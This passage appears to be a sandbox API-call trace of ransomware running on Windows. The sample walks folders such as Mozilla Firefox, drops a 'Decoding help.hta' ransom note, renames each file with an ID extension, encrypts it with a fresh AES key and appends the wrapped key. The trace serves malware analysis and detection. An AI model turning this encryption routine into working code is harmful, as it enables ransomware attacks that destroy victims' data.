| out: pbData=0x73cfbe4*, pdwDataLen=0x73cfce4*=0x2c) returned 1 [0039.654] MapViewOfFile (hFileMappingObject=0x184, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12800) returned 0x510000 [0039.656] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x73cfbe4*, pdwDataLen=0x73cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x73cfbe4*, pdwDataLen=0x73cfcf8*=0x100) returned 1 [0039.656] CryptEncrypt (in: hKey=0x5a5570, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x510000, pdwDataLen=0x73cfce4*=0x12800, dwBufLen=0x12800 | out: pbData=0x510000*, pdwDataLen=0x73cfce4*=0x12800) returned 1 [0039.657] UnmapViewOfFile (lpBaseAddress=0x510000) returned 1 [0039.659] CloseHandle (hObject=0x184) returned 1 [0039.659] CryptDestroyKey (hKey=0x5a5570) returned 1 [0039.659] CryptReleaseContext (hProv=0x5dc830, dwFlags=0x0) returned 1 [0039.659] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.659] WriteFile (in: hFile=0x134, lpBuffer=0x73cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x73cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x73cfbe4*, lpNumberOfBytesWritten=0x73cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.660] WriteFile (in: hFile=0x134, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x73cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x73cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.660] CloseHandle (hObject=0x134) returned 1 [0039.661] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\sections.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.662] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0x73cfd30 | out: lpFindFileData=0x73cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8362970, ftCreationTime.dwHighDateTime=0x1d4dde7, ftLastAccessTime.dwLowDateTime=0x8c8bb200, ftLastAccessTime.dwHighDateTime=0x1d4f2fd, ftLastWriteTime.dwLowDateTime=0x8c8bb200, ftLastWriteTime.dwHighDateTime=0x1d4f2fd, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="sections.exe", cAlternateFileName="")) returned 0 [0039.662] FindClose (in: hFindFile=0x5a55b0 | out: hFindFile=0x5a55b0) returned 1 Thread: id = 69 os_tid = 0xb48 [0039.509] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Oracle\\*.*", lpFindFileData=0x3e4fd30 | out: lpFindFileData=0x3e4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7e3c6d00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eea3160, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0039.509] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.509] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x3e4fd30 | out: lpFindFileData=0x3e4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7e3c6d00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eea3160, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.509] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.509] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.509] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x3e4fd30 | out: lpFindFileData=0x3e4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7e3c6d00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eea3160, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0039.510] FindClose (in: hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 70 os_tid = 0xb4c [0039.517] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*", lpFindFileData=0x750fd30 | out: lpFindFileData=0x750fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaeef6000, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x1052bf50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1052bf50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5530 [0039.517] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.517] FindNextFileW (in: hFindFile=0x5a5530, lpFindFileData=0x750fd30 | out: lpFindFileData=0x750fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaeef6000, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x1052bf50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1052bf50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.525] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.525] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.525] FindNextFileW (in: hFindFile=0x5a5530, lpFindFileData=0x750fd30 | out: lpFindFileData=0x750fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef422c0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaef422c0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x23996480, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x4e70, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessibleMarshal.dll", cAlternateFileName="ACCESS~1.DLL")) returned 1 [0039.525] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*" [0039.525] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*") returned 46 [0039.525] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\Decoding help.hta" [0039.525] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\Decoding help.hta" (normalized: "c:\\program files (x86)\\mozilla firefox\\decoding help.hta")) returned 0xffffffff [0039.525] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\Decoding help.hta" (normalized: "c:\\program files (x86)\\mozilla firefox\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0039.525] WriteFile (in: hFile=0x128, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x750fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x750fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.526] CloseHandle (hObject=0x128) returned 1 [0039.526] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.527] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AccessibleMarshal.dll") returned 1 [0039.527] lstrlenW (lpString="AccessibleMarshal.dll") returned 21 [0039.527] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*" [0039.527] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*") returned 46 [0039.527] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\", lpString2="AccessibleMarshal.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\AccessibleMarshal.dll") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\AccessibleMarshal.dll" [0039.527] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\AccessibleMarshal.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\AccessibleMarshal.dll") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\AccessibleMarshal.dll" [0039.527] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\AccessibleMarshal.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\AccessibleMarshal.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\AccessibleMarshal.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.527] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\AccessibleMarshal.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\accessiblemarshal.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\AccessibleMarshal.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\mozilla firefox\\accessiblemarshal.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.535] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\AccessibleMarshal.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\mozilla firefox\\accessiblemarshal.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0039.536] CreateFileMappingA (hFile=0x18c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x1e8 [0039.536] CryptAcquireContextA (in: phProv=0x750fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x750fcec*=0x5dc830) returned 1 [0039.537] CryptGenKey (in: hProv=0x5dc830, Algid=0x6610, dwFlags=0x1, phKey=0x750fce8 | out: phKey=0x750fce8*=0x5a52f0) returned 1 [0039.537] CryptExportKey (in: hKey=0x5a52f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x750fbe4, pdwDataLen=0x750fce4 | out: pbData=0x750fbe4*, pdwDataLen=0x750fce4*=0x2c) returned 1 [0039.537] MapViewOfFile (hFileMappingObject=0x1e8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4e60) returned 0x2d0000 [0039.541] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x750fbe4*, pdwDataLen=0x750fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x750fbe4*, pdwDataLen=0x750fcf8*=0x100) returned 1 [0039.559] CryptEncrypt (in: hKey=0x5a52f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000, pdwDataLen=0x750fce4*=0x4e60, dwBufLen=0x4e60 | out: pbData=0x2d0000*, pdwDataLen=0x750fce4*=0x4e60) returned 1 [0039.559] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0039.560] CloseHandle (hObject=0x1e8) returned 1 [0039.560] CryptDestroyKey (hKey=0x5a52f0) returned 1 [0039.560] CryptReleaseContext (hProv=0x5dc830, dwFlags=0x0) returned 1 [0039.560] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.561] WriteFile (in: hFile=0x18c, lpBuffer=0x750fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x750fcf8, lpOverlapped=0x0 | out: lpBuffer=0x750fbe4*, lpNumberOfBytesWritten=0x750fcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.561] WriteFile (in: hFile=0x18c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x750fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x750fcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.562] CloseHandle (hObject=0x18c) returned 1 [0039.562] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\AccessibleMarshal.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.563] FindNextFileW (in: hFindFile=0x5a5530, lpFindFileData=0x750fd30 | out: lpFindFileData=0x750fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef68420, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaef68420, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x774f8200, ftLastWriteTime.dwHighDateTime=0x1ced1dd, nFileSizeHigh=0x0, nFileSizeLow=0x279, dwReserved0=0x0, dwReserved1=0x0, cFileName="application.ini", cAlternateFileName="APPLIC~1.INI")) returned 1 [0039.563] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*" [0039.563] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*") returned 46 [0039.563] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\Decoding help.hta" [0039.563] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\Decoding help.hta" (normalized: "c:\\program files (x86)\\mozilla firefox\\decoding help.hta")) returned 0x1 [0039.563] lstrcmpiW (lpString1="Decoding help.hta", lpString2="application.ini") returned 1 [0039.563] lstrlenW (lpString="application.ini") returned 15 [0039.563] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*" [0039.563] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*") returned 46 [0039.563] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\", lpString2="application.ini" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\application.ini") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\application.ini" [0039.563] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\application.ini" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\application.ini") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\application.ini" [0039.563] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\application.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\application.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0039.563] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\application.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\application.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\application.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\mozilla firefox\\application.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.566] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\application.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\mozilla firefox\\application.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0039.566] CreateFileMappingA (hFile=0x1e8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x190 [0039.566] CryptAcquireContextA (in: phProv=0x750fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x750fcec*=0x5dc830) returned 1 [0039.567] CryptGenKey (in: hProv=0x5dc830, Algid=0x6610, dwFlags=0x1, phKey=0x750fce8 | out: phKey=0x750fce8*=0x5a55b0) returned 1 [0039.567] CryptExportKey (in: hKey=0x5a55b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x750fbe4, pdwDataLen=0x750fce4 | out: pbData=0x750fbe4*, pdwDataLen=0x750fce4*=0x2c) returned 1 [0039.567] MapViewOfFile (hFileMappingObject=0x190, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x260) returned 0x2d0000 [0039.571] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x750fbe4*, pdwDataLen=0x750fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x750fbe4*, pdwDataLen=0x750fcf8*=0x100) returned 1 [0039.571] CryptEncrypt (in: hKey=0x5a55b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0x750fce4*=0x260, dwBufLen=0x260 | out: pbData=0x2d0000*, pdwDataLen=0x750fce4*=0x260) returned 1 [0039.571] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0039.572] CloseHandle (hObject=0x190) returned 1 [0039.572] CryptDestroyKey (hKey=0x5a55b0) returned 1 [0039.572] CryptReleaseContext (hProv=0x5dc830, dwFlags=0x0) returned 1 [0039.572] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.572] WriteFile (in: hFile=0x1e8, lpBuffer=0x750fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x750fcf8, lpOverlapped=0x0 | out: lpBuffer=0x750fbe4*, lpNumberOfBytesWritten=0x750fcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.573] WriteFile (in: hFile=0x1e8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x750fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x750fcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.573] CloseHandle (hObject=0x1e8) returned 1 [0039.574] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\application.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.574] FindNextFileW (in: hFindFile=0x5a5530, lpFindFileData=0x750fd30 | out: lpFindFileData=0x750fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef68420, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaef68420, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x2431fb00, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x12670, dwReserved0=0x0, dwReserved1=0x0, cFileName="breakpadinjector.dll", cAlternateFileName="BREAKP~1.DLL")) returned 1 [0039.574] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*" [0039.574] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*") returned 46 [0039.574] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\Decoding help.hta" [0039.574] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\Decoding help.hta" (normalized: "c:\\program files (x86)\\mozilla firefox\\decoding help.hta")) returned 0x1 [0039.574] lstrcmpiW (lpString1="Decoding help.hta", lpString2="breakpadinjector.dll") returned 1 [0039.574] lstrlenW (lpString="breakpadinjector.dll") returned 20 [0039.574] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*" [0039.574] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*") returned 46 [0039.574] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\", lpString2="breakpadinjector.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\breakpadinjector.dll") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\breakpadinjector.dll" [0039.574] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\breakpadinjector.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\breakpadinjector.dll") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\breakpadinjector.dll" [0039.574] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\breakpadinjector.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\breakpadinjector.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\breakpadinjector.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.574] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\breakpadinjector.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\breakpadinjector.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\breakpadinjector.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\mozilla firefox\\breakpadinjector.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.575] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\breakpadinjector.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\mozilla firefox\\breakpadinjector.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0039.575] CreateFileMappingA (hFile=0x1e8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x190 [0039.575] CryptAcquireContextA (in: phProv=0x750fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x750fcec*=0x5d7650) returned 1 [0039.576] CryptGenKey (in: hProv=0x5d7650, Algid=0x6610, dwFlags=0x1, phKey=0x750fce8 | out: phKey=0x750fce8*=0x5a52f0) returned 1 [0039.576] CryptExportKey (in: hKey=0x5a52f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x750fbe4, pdwDataLen=0x750fce4 | out: pbData=0x750fbe4*, pdwDataLen=0x750fce4*=0x2c) returned 1 [0039.576] MapViewOfFile (hFileMappingObject=0x190, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12660) returned 0x510000 [0039.582] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x750fbe4*, pdwDataLen=0x750fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x750fbe4*, pdwDataLen=0x750fcf8*=0x100) returned 1 [0039.582] CryptEncrypt (in: hKey=0x5a52f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x510000, pdwDataLen=0x750fce4*=0x12660, dwBufLen=0x12660 | out: pbData=0x510000*, pdwDataLen=0x750fce4*=0x12660) returned 1 [0039.585] UnmapViewOfFile (lpBaseAddress=0x510000) returned 1 [0039.586] CloseHandle (hObject=0x190) returned 1 [0039.586] CryptDestroyKey (hKey=0x5a52f0) returned 1 [0039.586] CryptReleaseContext (hProv=0x5d7650, dwFlags=0x0) returned 1 [0039.586] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.586] WriteFile (in: hFile=0x1e8, lpBuffer=0x750fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x750fcf8, lpOverlapped=0x0 | out: lpBuffer=0x750fbe4*, lpNumberOfBytesWritten=0x750fcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.587] WriteFile (in: hFile=0x1e8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x750fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x750fcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.587] CloseHandle (hObject=0x1e8) returned 1 [0039.589] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\breakpadinjector.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.589] FindNextFileW (in: hFindFile=0x5a5530, lpFindFileData=0x750fd30 | out: lpFindFileData=0x750fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaef68420, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf288100, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf288100, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="browser", cAlternateFileName="")) returned 1 [0039.589] lstrcmpW (lpString1=".", lpString2="browser") returned -1 [0039.589] lstrcmpW (lpString1="..", lpString2="browser") returned -1 [0039.589] lstrcmpiW (lpString1="windows", lpString2="browser") returned 1 [0039.590] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*" 